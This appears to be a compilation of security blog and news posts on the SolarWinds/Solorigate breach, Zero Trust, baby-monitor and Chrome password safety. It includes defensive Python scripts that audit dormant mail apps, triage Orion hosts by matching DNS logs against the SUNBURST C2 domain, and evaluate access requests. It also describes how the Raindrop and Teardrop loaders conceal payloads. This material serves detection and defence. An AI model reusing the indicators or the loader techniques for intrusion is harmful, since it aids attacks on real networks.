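def audit(apps, today, dormant_days=90, fresh_cred_days=30):
    """Flag privileged mail apps that were dormant, got new credentials, or both."""
    findings = []
    for app in apps:
        privileged = sorted(app.app_permissions & MAIL_PRIVILEGED)
        if not privileged:
            continue  # only app-only mailbox access is in scope here
        gap, resumed = longest_silence(app.sign_ins)
        reactivated = gap > dormant_days
        fresh = [(d, who) for d, who in app.credentials
                 if (today - d).days <= fresh_cred_days]
        last = max(app.sign_ins) if app.sign_ins else None
        dormant_now = last is None or (today - last).days > dormant_days

        if reactivated and fresh:
            d, who = fresh[0]
            findings.append(Finding(app.name, "high",
                "sign-ins resumed on %s after %d days of silence and %s added a "
                "credential on %s; holds %s" % (resumed, gap, who, d, privileged)))
        elif reactivated:
            findings.append(Finding(app.name, "medium",
                "sign-ins resumed on %s after %d days of silence; confirm who "
                "is using it" % (resumed, gap)))
        elif fresh:
            d, who = fresh[0]
            findings.append(Finding(app.name, "medium",
                "%s added a credential on %s to an app holding %s; confirm a "
                "change record exists" % (who, d, privileged)))
        elif dormant_now:
            findings.append(Finding(app.name, "low",
                "no sign-ins since %s but still holds %s; remove the app or "
                "its permissions" % (last, privileged)))
    return findings


# Constructed inventory; names, dates and actors are made up for this example.
SAMPLE_APPS = [
    AppRecord("Legacy Mail Filter", {"full_access_as_app"},
              [date(2020, m, 15) for m in range(1, 7)]
              + [date(2020, 12, 1), date(2020, 12, 10)],
              [(date(2019, 3, 1), "it-admin"), (date(2020, 11, 28), "svc-sync")]),
    AppRecord("HR Connector", {"User.Read.All"},
              [date(2020, 12, 1)], [(date(2020, 11, 30), "hr-admin")]),
    AppRecord("Old Archive Tool", {"Mail.Read"},
              [date(2020, 1, 10), date(2020, 2, 10), date(2020, 3, 10)], []),
    AppRecord("Helpdesk Mailer", {"Mail.Send"},
              [date(2020, 11, 1), date(2020, 11, 15), date(2020, 12, 1), date(2020, 12, 12)],
              [(date(2019, 6, 1), "it-admin")]),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_APPS, AS_OF):
        print("[%s] %s: %s" % (f.severity.upper(), f.app, f.reason))
```

The high finding is the pattern to chase first: a credential added shortly before an app that had been idle for half a year starts requesting tokens again. The low finding is the cheaper fix, removing mailbox permissions from anything nobody has used in months, so there is nothing dormant left to abuse.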

Malwarebytes performed a deep investigation of its infrastructure, inspecting its source code and its build and delivery processes, and confirmed that its internal on-premises and production systems showed no evidence of unauthorized access or compromise. Customers using its anti-malware products were therefore not impacted.

“While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets,” concludes the company.

“It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.”


Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Malwarebytes’ email systems hacked by SolarWinds attackers appeared first on Security Affairs.

The SolarWinds Orion Breach, and What You Should Know

By Joe Marshall of Cisco Talos and Paul Smith of Cisco IoT

What is this?

On December 11th, 2020, the U.S. government and the company SolarWinds disclosed a breach into their SolarWinds Orion Platform network management software. This attack was conducted by a sophisticated and likely nation-state based attacker. SolarWinds Orion is a commonly used network management software stack used to manage complex switched and routed IT/OT architectures.

High profile customers of the Orion platform are numerous U.S. government agencies, and many private entities. The adversary was able to penetrate SolarWinds software development infrastructure, and bolt malware into a legitimate software update from SolarWinds for their Orion platform. In March of 2020, this malicious ‘patch’ was distributed, which then could provide backdoor access into the victim’s networks where the adversary could then exfiltrate data.

Due to the enormity of this attack, forensic and threat intelligence information is still rapidly changing. For Cisco Secure and IoT customers, our security coverage and updates can be found at the Cisco Talos blog post here. At the time of this posting, SolarWinds customer exposure is stated to be less than 18,000 of the 30,000 Orion platform customers.

What do you do about it?

Per an advisory published by the Cybersecurity & Infrastructure Security Agency (CISA), potential victims should identify which category they fall into based on whether or not they installed one of the following Orion builds, and whether those systems contacted the command and control (C2) domain avsvmcloud[.]com:

  • Orion Platform 2019.4 HF5, version 2019.4.5200.9083
  • Orion Platform 2020.2 RC1, version 2020.2.100.12219
  • Orion Platform 2020.2 RC2, version 2020.2.5200.12394
  • Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432

To determine a level of concern, CISA has also given these categories to help you understand risks and perform incident response as necessary.

  • Category 1: includes those who do not have the identified malicious binary. These owners can patch their systems and resume use as determined by and consistent with their internal risk evaluations.
  • Category 2: includes those who have identified the presence of the malicious binary—with or without beaconing to avsvmcloud[.]com. Owners with infected appliances communicating with avsvmcloud[.]com but not with a secondary C2—a fact that can be verified by comprehensive network monitoring for the device—can harden the device, re-install the updated software from a verified software supply chain, and resume use as determined by and consistent with a thorough risk evaluation.
  • Category 3: includes those with the binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address. If you observed communications with avsvmcloud[.]com that appear to suddenly cease prior to December 14, 2020— not due to an action taken by your network defenders—you fall into this category. Assume the environment has been compromised, and initiate incident response procedures immediately.
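The three categories above are a decision procedure over two facts: which Orion build is installed and what the server resolved. The following Python is an added example, not code from Cisco, Talos or CISA, that scripts that procedure against DNS telemetry. It takes the Orion build string and a small constructed DNS log (the “timestamp host name” line format, the host name and the DGA labels are made up for this example), treats any non-allowlisted name the Orion server resolves after its first SUNBURST beacon as a candidate secondary C2, and flags beaconing that stops on its own before December 14, 2020. The allowlist of expected destinations and the “defenders blocked the domain” flag are assumed to be supplied by the operator.

```python
"""Triage an Orion host into the CISA victim categories (added example).

Inputs: the installed Orion build string and DNS log lines in a constructed
'YYYY-MM-DDTHH:MM:SS host queried_name' format. The allowlist of names the
Orion server is expected to resolve is assumed to come from the operator.
"""
from dataclasses import dataclass
from datetime import datetime

# Trojanised Orion builds from the CISA list quoted above.
AFFECTED_VERSIONS = {
    "2019.4.5200.9083",   # 2019.4 HF5
    "2020.2.100.12219",   # 2020.2 RC1
    "2020.2.5200.12394",  # 2020.2 RC2
    "2020.2.5300.12432",  # 2020.2 and 2020.2 HF1
}
SUNBURST_DOMAIN = "avsvmcloud.com"
# Beaconing that stops by itself before this date is a Category 3 indicator.
CUTOFF = datetime(2020, 12, 14)


@dataclass
class Triage:
    category: int
    reason: str


def parse_dns_log(lines):
    """Parse constructed log lines into (time, host, lowercased name)."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, host, name = line.split()
        records.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
                        host, name.rstrip(".").lower()))
    return records


def is_sunburst_beacon(name):
    """SUNBURST's generated names are subdomains of avsvmcloud.com."""
    return name == SUNBURST_DOMAIN or name.endswith("." + SUNBURST_DOMAIN)


def triage(orion_version, dns_lines, allowed_domains, defenders_blocked=False):
    """Return the CISA category (1, 2 or 3) for one Orion host.

    defenders_blocked: True if the SOC itself sinkholed or blocked
    avsvmcloud.com, in which case a stop in beaconing is explained.
    """
    if orion_version not in AFFECTED_VERSIONS:
        return Triage(1, "Orion build %s is not a trojanised build" % orion_version)

    records = parse_dns_log(dns_lines)
    beacon_times = sorted(t for t, _, n in records if is_sunburst_beacon(n))
    if not beacon_times:
        return Triage(2, "trojanised build present but no beaconing seen; "
                         "rebuild from a verified supply chain")

    # Anything the host resolved after it first beaconed, other than the
    # allowlisted names, is a candidate second-stage C2 to investigate.
    first_beacon = beacon_times[0]
    candidates = sorted((t, n) for t, _, n in records
                        if t >= first_beacon and not is_sunburst_beacon(n)
                        and n not in allowed_domains)
    if candidates:
        t, n = candidates[0]
        return Triage(3, "secondary C2 candidate %s resolved at %s; assume compromise"
                      % (n, t.strftime("%Y-%m-%d %H:%M")))

    last_beacon = beacon_times[-1]
    log_end = max(t for t, _, _ in records)
    if last_beacon < CUTOFF and log_end > last_beacon and not defenders_blocked:
        return Triage(3, "beaconing stopped on its own on %s, before %s; assume compromise"
                      % (last_beacon.date(), CUTOFF.date()))

    return Triage(2, "beaconing to avsvmcloud.com only; harden, reinstall from a "
                     "verified supply chain and keep monitoring")


# Constructed sample telemetry for an Orion server called orion01.
ALLOWED = {"downloads.solarwinds.com", "time.windows.com"}
LOG_BEACON_ONLY = [
    "2020-11-02T03:10:00 orion01 k2j7x.appsync-api.eu-west-1.avsvmcloud.com",
    "2020-11-20T03:10:00 orion01 time.windows.com",
    "2020-12-18T03:10:00 orion01 p9q1z.appsync-api.us-east-2.avsvmcloud.com",
]
LOG_CEASED = [
    "2020-11-02T03:10:00 orion01 k2j7x.appsync-api.eu-west-1.avsvmcloud.com",
    "2020-11-15T03:10:00 orion01 h4m2c.appsync-api.eu-west-1.avsvmcloud.com",
    "2020-12-18T03:10:00 orion01 time.windows.com",
]
LOG_SECOND_STAGE = LOG_BEACON_ONLY + [
    "2020-12-01T04:00:00 orion01 stage2.example.invalid",
]

if __name__ == "__main__":
    for label, log in (("beacon only", LOG_BEACON_ONLY),
                       ("ceased early", LOG_CEASED),
                       ("second stage", LOG_SECOND_STAGE)):
        result = triage("2020.2.5300.12432", log, ALLOWED)
        print("%-13s category %d: %s" % (label, result.category, result.reason))
```

A “candidate” secondary C2 here only means a name outside the allowlist; confirming it still requires the published indicator lists and the host’s own forensic timeline. The script narrows the work, it does not finish it, and a host it places in Category 2 should stay under network monitoring until it has been rebuilt.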

What does this mean?

The SolarWinds Orion compromise is an incredibly impactful attack across numerous industrial verticals, especially electric subsectors concerned with critical infrastructure. This will perhaps be regarded in the same category as NotPetya or CCleaner, as another successful nation-state supply chain attack with vast ramifications. As this is a recently discovered attack both in breadth and scope, we will be unpacking the damage done and discovering new forensic details for a considerable amount of time. Now is as good a time as any to consider your operating risks and cyber threats to your business continuity.

As potentially damaging as the SolarWinds compromise could be, it could also be a catalyst for positive change for your enterprise. We would encourage you to think about your converged IT/OT architectures – what exposures and risks do you have not just from something like the SolarWinds compromise, but with any enterprise products that straddle both information and operational technology enterprises. Could you identify all the risks and exposures you have? From fundamental asset identification and network mappings and data flows, to unpatched vulnerabilities and process identification, there is a lot to consider.

It is also important to note that the attack on the SolarWinds Orion platform can absolutely cause an unwanted disruption in an operational network. Due to the pervasive nature of this platform, its tendrils can extend very far into the spine of an operational technology environment. From assigning IPs and port security, to Active Directory integrations, to patch management and network monitoring, SolarWinds Orion can run very deep into networks. This is largely undesirable for security reasons, but many enterprises may view it as a necessary evil to maintain a large and complex infrastructure.

Furthermore, due to the nature of how products like SolarWinds Orion manage the infrastructure, they require stored credentials and keys to be put in place to deliver that ease of use. This has long been the dilemma faced in IT/OT infrastructure: fewer people managing larger-scale networks using the convenience of ‘single pane of glass’ tools. These create security holes, and it is really up to the enterprise to weigh the risk vs. reward.

Conclusion

Long gone are the halcyon days of only external cyber risks to your enterprise. As organizations outsource all or parts of their IT and make heavier use of cloud services, their cybersecurity relies even more on that of their suppliers. We now live in an era of nation-state compromised supply chains that could impact your enterprise in profound ways. Given the considerable burden of managing your enterprise’s security, and now contending with nation-state supply chain attacks, it can likely feel overwhelming as a defender. Our suggestion: start at the basics and work forward. Ask yourselves what’s the worst day you could have and plan your risks accordingly.

Consider strategies like operating your industrial infrastructure in a zero trust model that can help mitigate damage done, not just against the SolarWinds compromise, but against ransomware or other malware attacks. Consider how well you know your networks, and if you know what there is to protect. Think about security monitoring and protections in your OT environments. Consider emergency response playbooks for cyber incident response. Consider safety concerns if an attack impacts your operations, or your regulatory compliance.

Ultimately, these are all difficult questions with complex answers, but the resilience and safety of your organization are worth the journey. Here is how Cisco can help:

Cisco Cyber Vision has been specifically developed for OT and IT teams to work together to ensure continuity, security, resilience and safety of your industrial operations. Cyber Vision has behavioral analysis and Snort® intrusion detection capabilities to detect malicious traffic. The latest Cyber Vision knowledge base includes Cisco Talos IDS signatures to detect SolarWinds attacks. If you have not done so already, we recommend you install it today by downloading it here.

Cisco Talos Incident Response (CTIR) provides a full suite of proactive and emergency services to help you prepare, respond and recover from a breach. CTIR enables 24-hour emergency response capabilities and direct access to Cisco Talos, the world’s largest threat intelligence and research group.

Cisco Talos Intelligence Group is one of the largest commercial threat intelligence teams in the world, comprised of world-class researchers, analysts and engineers. These teams are supported by unrivaled telemetry and sophisticated systems to create accurate, rapid and actionable threat intelligence for Cisco customers, products and services. Talos defends Cisco customers against known and emerging threats, discovers new vulnerabilities in common software, and interdicts threats in the wild before they can further harm the internet at large. Talos maintains the official rule sets of Snort.org, ClamAV, and SpamCop, in addition to releasing many open-source research and analysis tools.

Raindrop, a fourth malware employed in SolarWinds attacks

The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads.

Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware named Raindrop for lateral movement and deploying additional payloads.

Raindrop is the fourth piece of malware discovered while investigating the SolarWinds attack, after the SUNSPOT build-system implant, the Sunburst/Solorigate backdoor and the Teardrop tool.

Raindrop (Backdoor.Raindrop) is a loader that was used by attackers to deliver a Cobalt Strike payload. Raindrop is similar to the Teardrop tool, but while the latter was delivered by the initial Sunburst backdoor, the former was used for spreading across the victim’s network. 

“Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.” reads a blog post published by Symantec.

Symantec has investigated four Raindrop infections to date; the malware was employed in the last phases of the attacks, against a small number of selected targets.


Both Raindrop and Teardrop are used to deploy Cobalt Strike Beacon, but they use different packers and different Cobalt Strike configurations.

“To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol.” continues the post.

“All three Raindrop samples using HTTPS communication follow very similar configuration patterns as previously seen in one Teardrop sample.”

The following table, taken from Symantec’s report, lists the key differences between the two tools:

Payload format
  Teardrop: Custom, reusing features from PE format. It may be possible to reuse the packer with a range of different payloads supplied as PE DLLs with automatic conversion.
  Raindrop: Shellcode only.

Payload embedding
  Teardrop: Binary blob in data section.
  Raindrop: Steganography, stored at pre-determined locations within the machine code.

Payload encryption
  Teardrop: visualDecrypt combined with XOR using long key.
  Raindrop: AES layer before decompression; separate XOR layer using one byte key after decompression.

Payload compression
  Teardrop: None.
  Raindrop: LZMA.

Obfuscation
  Teardrop: Reading JPEG file. Inserted blocks of junk code, some could be generated using a polymorphic engine.
  Raindrop: Non-functional code to delay execution.

Export names
  Teardrop: Export names vary, in some cases names overlapping with Tcl/Tk projects.
  Raindrop: Export names overlap with Tcl/Tk projects.

Stolen code
  Teardrop: Byte-copy of machine code from pre-existing third-party components. The original code is distributed in compiled format only.
  Raindrop: Recompiled third-party source code.

The report published by Symantec includes IoCs and Yara Rules.


Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Raindrop, a fourth malware employed in SolarWinds attacks appeared first on Security Affairs.

Using Zero Trust principles to protect against sophisticated attacks like Solorigate

The Solorigate supply chain attack has captured the focus of the world over the last month. This attack was simultaneously sophisticated and ordinary. The actor demonstrated sophistication in the breadth of tactics used to penetrate, expand across, and persist in affected infrastructure, but many of the tactics, techniques, and procedures (TTPs) were individually ordinary.

Companies operating with a Zero Trust mentality across their entire environment are more resilient, consistent, and responsive to new attacks—Solorigate is no different. As threats increase in sophistication, Zero Trust matters more than ever, but gaps in the application of the principles—such as unprotected devices, weak passwords, and gaps in multi-factor authentication (MFA) coverage can be exploited by actors.

Zero Trust Principles

Applying Zero Trust

Zero Trust in practical terms is a transition from implicit trust—assuming that everything inside a corporate network is safe—to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data. It relies on contextual real-time policy enforcement to achieve least privileged access and minimize risks. Automation and Machine Learning are used to enable rapid detection, prevention, and remediation of attacks using behavior analytics and large datasets.

Zero Trust Policy

Verify explicitly

To verify explicitly means we should examine all pertinent aspects of access requests instead of assuming trust based on a weak assurance like network location. Examine the identity, endpoint, network, and resource then apply threat intelligence and analytics to assess the context of each access request.

When we look at how attackers compromised identity environments with Solorigate, there were three major vectors: compromised user accounts, compromised vendor accounts, and compromised vendor software. In each of these cases, we can clearly see where the attacker exploited gaps in explicit verification.

  • Where user accounts were compromised, known techniques like password spray, phishing, or malware were used to compromise user credentials and gave the attacker critical access to the customer network. On-premises identity systems are more vulnerable to these common attacks because they lack cloud-powered protections like password protection, recent advances in password spray detection, or enhanced AI for account compromise prevention.
  • Again, in cases where the actor succeeded, highly privileged vendor accounts lacked protections such as MFA, IP range restrictions, device compliance, or access reviews. In other cases, user accounts designated for use with vendor software were configured without MFA or policy restrictions. Vendor accounts should be configured and managed with the same rigor as used for the accounts which belong to the organization.
  • Even in the worst case of SAML token forgery, excessive user permissions and missing device and network policy restrictions allowed the attacks to progress. The first principle of Zero Trust is to verify explicitly—be sure you extend this verification to all access requests, even those from vendors and especially those from on-premises environments.

Cloud identity, like Azure Active Directory (Azure AD), is simpler and safer than federating with on-premises identity. Not only is it easier to maintain (fewer moving parts for attackers to exploit), it also lets your Zero Trust policy be informed by cloud intelligence. Our ability to reason over more than eight trillion signals a day across the Microsoft estate, coupled with advanced analytics, allows for the detection of anomalies that are very subtle and only detectable in very large data sets. User history, organization history, threat intelligence, and real-time observations are an essential mechanism in a modern defense strategy. Enhance this signal with endpoint health and compliance, device compliance policies, app protection policies, session monitoring and control, and resource sensitivity to get to a Zero Trust verification posture.

For customers that use federation services today, we continue to develop tools to simplify migration to Azure AD. Start by discovering the apps that you have and analyzing migration work using Azure AD Connect health and activity reports.

Least privileged access

Zero Trust: Microsoft Step by Step

Least privileged access helps ensure that permissions are only granted to meet specific business goals from the appropriate environment and on appropriate devices. This minimizes the attacker’s opportunities for lateral movement by granting access in the appropriate security context and after applying the correct controls—including strong authentication, session limitations, or human approvals and processes. The goal is to compartmentalize attacks by limiting how much any compromised resource (user, device, or network) can access others in the environment.

With Solorigate, the attackers took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all. Conversely, customers with good least-privileged access policies such as using Privileged Access Workstations (PAW) devices were able to protect key resources even in the face of initial network access by the attackers.
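The two principles above, verify explicitly and least privileged access, come down to one access decision that checks every signal for every request, with no carve-out for vendor accounts. The following Python is an added example, not Microsoft’s code or any product’s policy engine: it evaluates constructed access requests against a constructed set of least-privilege grants, vendor egress ranges and managed-device requirements. The principals, resources and addresses are made up for the example. The token is assumed to have already passed signature validation, which is exactly the situation in the SAML-forgery case: a token that validates is still not enough on its own.

```python
"""Explicit-verification access decision (added example, not Microsoft's code).

Every request, including those from vendor accounts, is evaluated against the
same signals: a least-privilege grant, MFA, device compliance and network
origin. Reasons are accumulated instead of short-circuiting so a denial is
auditable. Grants, networks and principals are constructed for this example.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass
class AccessRequest:
    principal: str
    account_type: str     # "user", "vendor" or "service"
    mfa_satisfied: bool   # claim carried in the already signature-checked token
    device_compliant: bool
    source_ip: str
    resource: str
    action: str


@dataclass
class Decision:
    allowed: bool
    reasons: list


# Least-privilege grants: (resource, action) pairs a principal may perform.
GRANTS = {
    "alice@corp.example": {("crm", "read"), ("crm", "write")},
    "vendor-monitor@corp.example": {("netmgmt", "read")},
    "admin@corp.example": {("crm", "read"), ("tenant", "admin")},
}
# Vendor accounts are pinned to the egress ranges the vendor declared.
VENDOR_NETWORKS = {
    "vendor-monitor@corp.example": [ip_network("203.0.113.0/24")],
}
# Resources that may only be touched from a managed, compliant device.
MANAGED_DEVICE_RESOURCES = {"tenant", "netmgmt"}


def decide(req):
    """Allow only when every signal checks out; otherwise list every failure."""
    reasons = []
    # Least privilege: the grant must exist, regardless of who is asking.
    if (req.resource, req.action) not in GRANTS.get(req.principal, set()):
        reasons.append("no grant for %s on %s" % (req.action, req.resource))
    # Verify explicitly: a token that validates is not enough by itself.
    if not req.mfa_satisfied:
        reasons.append("MFA not satisfied")
    if req.resource in MANAGED_DEVICE_RESOURCES and not req.device_compliant:
        reasons.append("device not compliant for %s" % req.resource)
    if req.account_type == "vendor":
        ranges = VENDOR_NETWORKS.get(req.principal, [])
        if not any(ip_address(req.source_ip) in net for net in ranges):
            reasons.append("vendor source %s outside declared ranges" % req.source_ip)
    return Decision(not reasons, reasons)


# Constructed requests covering the gaps described in the post.
EMPLOYEE_OK = AccessRequest("alice@corp.example", "user", True, True,
                            "198.51.100.10", "crm", "read")
VENDOR_NO_MFA = AccessRequest("vendor-monitor@corp.example", "vendor", False, True,
                              "203.0.113.7", "netmgmt", "read")
VENDOR_OFF_RANGE = AccessRequest("vendor-monitor@corp.example", "vendor", True, True,
                                 "192.0.2.44", "netmgmt", "read")
# A forged token for a privileged user (MFA claim present) from an unmanaged
# device, and the same token asking for something the role never needed.
FORGED_ADMIN = AccessRequest("admin@corp.example", "user", True, False,
                             "192.0.2.99", "tenant", "admin")
FORGED_ADMIN_MAIL = AccessRequest("admin@corp.example", "user", True, False,
                                  "192.0.2.99", "mailboxes", "read")

if __name__ == "__main__":
    for req in (EMPLOYEE_OK, VENDOR_NO_MFA, VENDOR_OFF_RANGE,
                FORGED_ADMIN, FORGED_ADMIN_MAIL):
        d = decide(req)
        print(req.principal, "->",
              "ALLOW" if d.allowed else "DENY: " + "; ".join(d.reasons))
```

The point of the last two requests is the one the post makes about SAML token forgery: the forged token carries a satisfied MFA claim and names a real privileged account, yet the request still fails on the device and network signals, and a request for a permission the role was never granted fails before identity is even considered.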

Assume breach

Our final principle is to Assume Breach, building our processes and systems assuming that a breach has already happened or soon will. This means using redundant security mechanisms, collecting system telemetry, using it to detect anomalies, and wherever possible, connecting that insight to automation to allow you to prevent, respond and remediate in near-real-time.

Sophisticated analysis of anomalies in customer environments was key to detecting this complex attack. Customers that used rich cloud analytics and automation capabilities, such as those provided in Microsoft 365 Defender, were able to rapidly assess attacker behavior and begin their eviction and remediation procedures.

Importantly, organizations such as Microsoft who do not model “security through obscurity” but instead model as though the attacker is already observing them are able to have more confidence that mitigations are already in place because threat models assume attacker intrusions.

Summary and recommendations

It bears repeating that Solorigate is a truly significant and advanced attack. Ultimately, however, the risk from the attacker techniques observed in this incident can be significantly reduced or mitigated by applying known security best practices. For organizations—including Microsoft—thorough application of a Zero Trust security model provided meaningful protection against even this advanced attacker.

To apply the lessons from the Solorigate attack and the principles of Zero Trust that can help protect and defend, get started with these recommendations:

  1. More than any other single step, enable MFA to reduce account compromise probability by more than 99.9 percent. This is so important, we made Azure AD MFA free for any Microsoft customer using a subscription of a commercial online service.
  2. Configure for Zero Trust using our Zero Trust Deployment Guides.
  3. Look at our Identity workbook for Solorigate.

Stay safe out there.

Alex Weinert

For more information about Microsoft Zero Trust please visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Using Zero Trust principles to protect against sophisticated attacks like Solorigate appeared first on Microsoft Security.

The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part 1

Digital from birth


A baby can leave their first footprints on the internet even before they’re born.

The fact is that children start creating an identity online before they even put a little pinky on a device, let alone come home for the first time. That “Hello, world!” moment can come much, much sooner. And it will come from you.

From posting baby’s ultrasound pic to sharing a video of the gender reveal celebration, these are the first digital footprints that your child will make. With your help, of course, because it’s you who’ll snap all those photos, capture all those videos, and share many of them on the internet. Yet even though you’re the one who took them, those digital footprints you’ve created belong to your child.

And that’s something for us to pause and consider during this wonderful (and challenging!) stretch of early parenthood. Just as we look out for our children’s well-being in every other aspect of their little lives, we must look out for their digital well-being too. Babies are entitled to privacy too. And their little digital lives need to be protected as well.

The connected lives of babies

Babies’ lives are more connected than you might think. Above and beyond the social media posts we make to commemorate all their “firsts,” from first solid food to first steps, there’s digital information associated with your child as well. Things like Social Security numbers, medical records, and even financial records related to them all exist, and all of it needs to be protected just as we protect the same digital information as adults.

Likewise, there’s all manner of connected devices like Wi-Fi baby monitors, baby sleep monitors, even smart cribs that sense restlessness in your baby and then rock and soothe those little cares away. Or how about a smart changing table that tracks the weight of your child over time? You and your baby may make use of those. And because all these things are connected, they have to be protected.

This is the first of two articles that take a look at this topic, and we’ll start with making good choices about purchasing “smart devices” and connected baby monitors, each a piece of technology that parents should investigate before bringing it into their home or nursery.

Buying smart devices for baby, Part One: Connect with your care provider

As a new parent, or as a parent who’s just added another tyke to the nest, you’ll know just how many products are designed for your baby—and then marketed toward your fears or concerns. Before buying such smart devices, read reviews and speak with your health care provider to get the facts.

For example, you can purchase connected monitors that track metrics like baby’s breathing, heart rate, and blood-oxygen levels while they sleep. While they’re often presented as a means of providing peace of mind, the question to ask is what that biometric information can really do for you. This is where your health care provider can come in, because if you have concerns about Sudden Infant Death Syndrome (SIDS), that’s a much larger conversation. Your provider can discuss the topic with you and whether such a device is an effective measure for your child.

Buying smart devices for baby, Part Two: Do your security research

Another question to ask is what’s done with the biometric data that such devices monitor. Is it kept on your smartphone, or is it stored in the cloud by the device manufacturer? Is that storage secure? Is the data shared with any third parties? Who owns that data? Can you opt in or opt out of sharing it? Can you access and delete it as needed? Your baby’s biometrics are highly personal info and must be protected as such. Without clear-cut answers about how your baby’s data is handled, you should consider giving that device a hard pass.

How do you get those answers? This is another instance where you’ll have to roll up your sleeves and read the privacy policy associated with the device or service in question. And as it is with privacy policies, some are written far more clearly and concisely than others. The information is in there. You may have to dig for it. (Of note, there are instances where parents consented to the use of their data for the purposes of government research, such as this study published by the U.S. National Institutes of Health.)

Related, here’s the advice I share on every connected “smart” device out there, from baby-related items to smart refrigerators: before you purchase, read up on reviews and comments from other customers. Look for news articles about the device manufacturer too. The fact of the matter is that some smart device manufacturers are much better at baking security protocols into their devices than others, so investigate their track record to see if you can uncover any issues with their products or security practices. Information such as this can help you make an even more informed choice.

Secure your Wi-Fi baby monitor (and other smart devices too)

An online search for “hacked baby monitor” will quickly call up several unsettling stories about hackers tuning into Wi-Fi baby monitors—scanning the camera about the room at will and perhaps even speaking directly to the child. Often, this is because the default factory password has not been changed by the parents. And a “default password” may as well be “public password” because lists of default passwords for connected devices are freely available on the internet. In fact, researchers from Ben Gurion University who looked at the basic security of off-the-shelf smart devices found that, “It only took 30 minutes to find passwords for most of the devices and some of them were found only through a Google search of the brand.”

The three things you can do to prevent this from happening to your Wi-Fi baby monitor, along with other connected devices around your home, are:

  1. Change the default password. Use a strong and unique password for your baby monitor and other devices.
  2. Update. Check regularly for device updates, as they often harden the security of the device in addition to adding performance upgrades.
  3. Use two-factor authentication if available. This, in addition to a password, offers an extra layer of protection that makes a device far more difficult to hack.

What about “old-style” baby monitors that work on a radio frequency (RF) like a walkie-talkie does? Given that they’re not connected to the internet, there’s less risk involved. That’s because hacking into an RF monitor requires a person to be in close physical proximity to the device and have access to the same broadcast frequency as your device—a far less likely proposition, yet a risk nonetheless. Some modern RF baby monitors even encrypt the radio signal, mitigating that much more risk.

And now, let’s talk about online privacy for babies and children

Next up, we’ll take a closer look at baby’s privacy online. Yes, that’s a thing! And an important one at that, as taking charge of their privacy right now can protect them from cybercrime and harm as they get older.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part 1 appeared first on McAfee Blogs.

New Year, new password protections in Chrome

Passwords help protect our online information, which is why it’s never been more important to keep them safe. But when we’re juggling dozens (if not hundreds!) of passwords across various websites—from shopping, to entertainment to personal finance—it feels like there’s always a new account to set up or manage. While it’s definitely a best practice to have a strong, unique password for each account, it can be really difficult to remember them all—that’s why we have a password manager in Chrome to back you up.

As you browse the web, on your phone, computer or tablet, Chrome can create, store and fill in your passwords with a single click. We'll warn you if your passwords have been compromised after logging in to sites, and you can always check for yourself in Chrome Settings. As we kick off the New Year, we’re excited to announce new updates that will give you even greater control over your passwords:

Easily fix weak passwords

We’ve all had moments where we’ve rushed to set up a new login, choosing a simple “name-of-your-pet” password to get set up quickly. However, weak passwords expose you to security risks and should be avoided. In Chrome 88, you can now complete a simple check to identify any weak passwords and take action easily.

To check your passwords, click on the key icon under your profile image, or type chrome://settings/passwords in your address bar.

Edit your passwords in one place

Chrome can already prompt you to update your saved passwords when you log in to websites. However, you may want to update multiple usernames and passwords easily, in one convenient place. That’s why starting in Chrome 88, you can manage all of your passwords even faster and easier in Chrome Settings on desktop and iOS (Chrome’s Android app will be getting this feature soon, too).

Building on the 2020 improvements

These new updates come on top of many improvements from last year which have all contributed to your online safety and make browsing the web even easier:

  • Password breaches remain a critical concern online. So we’re proud to share that Chrome’s Safety Check is used 14 million times every week! As a result of Safety Check and other improvements launched in 2020, we’ve seen a 37% reduction in compromised credentials stored in Chrome.
  • Starting last September, iOS users were able to autofill their saved passwords in other apps and browsers. Today, Chrome is streamlining 3 million sign-ins across iOS apps every week! We also made password filling more secure for Chrome users on iOS by adding biometric authentication (coming soon to Chrome on Android).
  • We’re always looking for ways to improve the user experience, so we made the password manager easier to use on Android with features like Touch-to-fill.

The new features with Chrome 88 will be rolled out over the coming weeks, so take advantage of the new updates to keep your passwords secure. Stay tuned for more great password features throughout 2021.

Microsoft Taking Additional Steps to Address Zerologon Flaw

Company Will Enforce Domain Controller Settings to Block Connections
Microsoft is alerting customers that starting Feb. 9, it will enforce domain controller settings within Active Directory to block connections that could exploit the unpatched Zerologon vulnerability in Windows Server. Microsoft has been warning about the urgency of patching the flaw for months.

OpenWRT Project Community Investigating Data Breach

Open-Source Development Project Asking Members to Reset Passwords
OpenWRT, an open-source project that develops operating systems, firmware and other software for connected and embedded devices, is investigating a data breach after a hacker gained access to an administrator account and apparently was able to access usernames and email addresses for community members.

Security is everyone’s priority

By Dana Mitchell, Director, Cybersecurity Solutions Group, Microsoft Canada Digital transformation, cloud computing and a sophisticated threat landscape are forcing everyone to rethink the roles that each individual within an organization has in defending against cyber threats. With billions of people around the globe working from home, changes to the daily practice of cybersecurity are…

